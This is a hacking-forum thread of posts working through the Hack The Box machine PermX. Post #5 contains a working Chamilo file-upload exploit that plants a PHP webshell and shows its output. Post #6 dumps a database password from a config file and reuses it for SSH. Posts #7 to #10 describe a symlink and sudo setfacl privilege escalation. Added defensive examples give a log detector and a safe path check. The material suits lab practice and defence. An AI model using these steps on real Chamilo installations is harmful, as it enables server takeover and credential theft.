HTB - PermX
by trevor69000 - Saturday July 6, 2024 at 07:40 PM
#1
https://app.hackthebox.com/machines/613 
Let's go
Reply
#2
https://starlabs.sg/advisories/23/23-3368/
Don't work, brute force user?
Reply
#3
http://lms.permx.htb/app/config/parameters.yml.dist

parameters:
    database_driver: pdo_mysql
    database_host: 127.0.0.1
    database_port: ~
    database_name: chamilo111
    database_user: root
    database_password: root

    mailer_transport: smtp
    mailer_host: 127.0.0.1
    mailer_user: ~
    mailer_password: ~

    # A secret key that's used to generate certain security-related tokens
    secret: ThisTokenIsNotSoSecretChangeIt
    password_encryption: sha1

    # Activation for multi-url access
    multiple_access_urls: false
    # Deny the elimination of users
    deny_delete_users: false
    installed: ~
    password_encryption: sha1
    sp_bower_bin: '/usr/bin/bower'

    url_append: ''
    sonata_media.cdn.host: /uploads/media

    # If you installed Chamilo in http://localhost/chamilo_master
    # you need to setup like this:
    # url_append: '/chamilo_master/web/'
    # sonata_media.cdn.host: /chamilo_master/web/uploads/media

    sonata_page.varnish.command: 'if [ ! -r "/etc/varnish/secret" ]; then echo "VALID ERROR :/"; else varnishadm -S /etc/varnish/secret -T 127.0.0.1:6082 {{ COMMAND }} "{{ EXPRESSION }}"; fi;'
    locales: [en, fr, es, de]
Reply
#4
(Jul 06, 2024, 07:43 PM)trevor69000 Wrote: http://lms.permx.htb/app/config/parameters.yml.dist

parameters:
    database_driver: pdo_mysql
    database_host: 127.0.0.1
    database_port: ~
    database_name: chamilo111
    database_user: root
    database_password: root

    mailer_transport: smtp
    mailer_host: 127.0.0.1
    mailer_user: ~
    mailer_password: ~

    # A secret key that's used to generate certain security-related tokens
    secret: ThisTokenIsNotSoSecretChangeIt
    password_encryption: sha1

    # Activation for multi-url access
    multiple_access_urls: false
    # Deny the elimination of users
    deny_delete_users: false
    installed: ~
    password_encryption: sha1
    sp_bower_bin: '/usr/bin/bower'

    url_append: ''
    sonata_media.cdn.host: /uploads/media

    # If you installed Chamilo in http://localhost/chamilo_master
    # you need to setup like this:
    # url_append: '/chamilo_master/web/'
    # sonata_media.cdn.host: /chamilo_master/web/uploads/media

    sonata_page.varnish.command: 'if [ ! -r "/etc/varnish/secret" ]; then echo "VALID ERROR :/"; else varnishadm -S /etc/varnish/secret -T 127.0.0.1:6082 {{ COMMAND }} "{{ EXPRESSION }}"; fi;'
    locales: [en, fr, es, de]

What does that mean?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#5
(Jul 06, 2024, 07:58 PM)fuckhackthebox Wrote: https://starlabs.sg/advisories/23/23-4220/

$ echo '<?php system("id"); ?>' > rce.php
$ curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

bro how can u know that the parameter is action?

Reply
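Added example, not part of the thread: a way to spot the request pair quoted in post #5 (an upload to bigUpload.php, then a request for a script under bigupload/files/) in a web server access log. The log lines, client addresses and the function names `sample_log` and `detect_bigupload` are constructed for illustration, and Apache combined log format is assumed.

```shell
#!/usr/bin/env bash
# Added example: flag "upload, then fetch a script from the upload dir"
# in an access log. All log lines below are constructed samples.

sample_log() {
cat <<'EOF'
10.10.14.5 - - [06/Jul/2024:19:55:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.7 - - [06/Jul/2024:19:57:40 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 40 "-" "curl/8.5.0"
10.10.14.7 - - [06/Jul/2024:19:57:52 +0000] "GET /main/inc/lib/javascript/bigupload/files/rce.php HTTP/1.1" 200 54 "-" "curl/8.5.0"
10.10.14.9 - - [06/Jul/2024:20:01:13 +0000] "GET /main/inc/lib/javascript/bigupload/files/notes.pdf HTTP/1.1" 404 196 "-" "Mozilla/5.0"
EOF
}

# Reads an access log on stdin and prints "ip<TAB>path" for each request to a
# script file under bigupload/files/ made by a client that previously got a
# 2xx answer to a POST on bigUpload.php.
detect_bigupload() {
    awk '
    {
        ip = $1; method = substr($6, 2); path = $7; status = $9
        sub(/\?.*/, "", path)          # drop the query string
        lp = tolower(path)             # match extensions case-insensitively
        if (method == "POST" && status ~ /^2/ &&
            lp ~ /\/bigupload\/inc\/bigupload\.php$/)
            uploaded[ip] = 1
        else if ((ip in uploaded) &&
                 lp ~ /\/bigupload\/files\/.*\.(php[0-9]?|phtml|phar)$/)
            printf "%s\t%s\n", ip, path
    }'
}

# Run directly against a real log: ./detect.sh /var/log/apache2/access.log
if [ "$#" -gt 0 ]; then detect_bigupload < "$1"; fi
```

Serving bigupload/files/ with script execution disabled breaks the second half of the pair regardless of what gets uploaded.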
#6
(Jul 06, 2024, 08:12 PM)fuckhackthebox Wrote:
(Jul 06, 2024, 08:10 PM)osamy7593 Wrote: bro how can u know that the parameter is action?

from the article I linked

it's literally just a copy-paste exploit, I didn't change anything

$ cat /var/www/chamilo/app/config/configuration.php
...

// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;

...

ssh in as mtz with that password to get user.txt

great man

Reply
#7
The sudo command seems like the obvious next step.


I tried creating a symlink
ln -s /root/root.txt root.txt

and then
sudo /opt/acl.sh mtz rwx /home/mtz/root.txt

But I get "Operation not permitted".

The root.txt gets regularly cleared so might be the right direction.
Reply
#8
why?

if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
mtz@permx:~$ sudo /opt/acl.sh mtz r /home/root/root.txt
sudo /opt/acl.sh mtz r /home/root/root.txt
Access denied.
mtz@permx:~$

Reply
#9
it says the file is not writable

Reply
#10
(Jul 06, 2024, 08:51 PM)shadow_monarch Wrote: mtz@permx:~$ ln -s /root/root.txt root1.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root1.txt
setfacl: /home/mtz/root1.txt: Operation not permitted


why ??

just do it within 8 seconds then it'll work
Reply
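Added example, not part of the thread and not the box's /opt/acl.sh: the `-f` test quoted in post #8 follows symlinks, and so does setfacl, which is why posts #7 and #10 revolve around a link placed in /home/mtz. A wrapper can refuse links and check the resolved path instead; `safe_target` and `ALLOWED_BASE` are hypothetical names and GNU `realpath` is assumed.

```shell
#!/usr/bin/env bash
# Added example: path validation for a sudo wrapper that hands a
# user-supplied path to setfacl. Names are hypothetical.

ALLOWED_BASE="${ALLOWED_BASE:-/home/mtz}"

# Prints the canonical path and returns 0 only if the target is a regular,
# non-symlink file whose resolved location lies inside ALLOWED_BASE.
safe_target() {
    local target="$1" base real
    # Canonicalise the base too, so a symlinked base cannot widen the scope.
    base="$(realpath -e -- "$ALLOWED_BASE")" || return 1
    # [ -f ] alone follows symlinks, so test for the link itself first.
    if [ -L "$target" ]; then
        echo "symlink refused" >&2
        return 1
    fi
    # Resolve every component: a parent directory may be a link as well,
    # and ".." segments are collapsed here rather than pattern-matched.
    real="$(realpath -e -- "$target")" || return 1
    case "$real" in
        "$base"/*) ;;
        *) echo "outside $base" >&2; return 1 ;;
    esac
    if [ ! -f "$real" ]; then
        echo "not a regular file" >&2
        return 1
    fi
    # The caller should pass this resolved path to setfacl, not the original
    # argument. A check-then-use gap still exists if the user can swap the
    # file in between, so the base directory should not be user-writable.
    printf '%s\n' "$real"
}

# Run directly: ./safe_target.sh /home/mtz/somefile
if [ "$#" -gt 0 ]; then safe_target "$1"; fi
```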

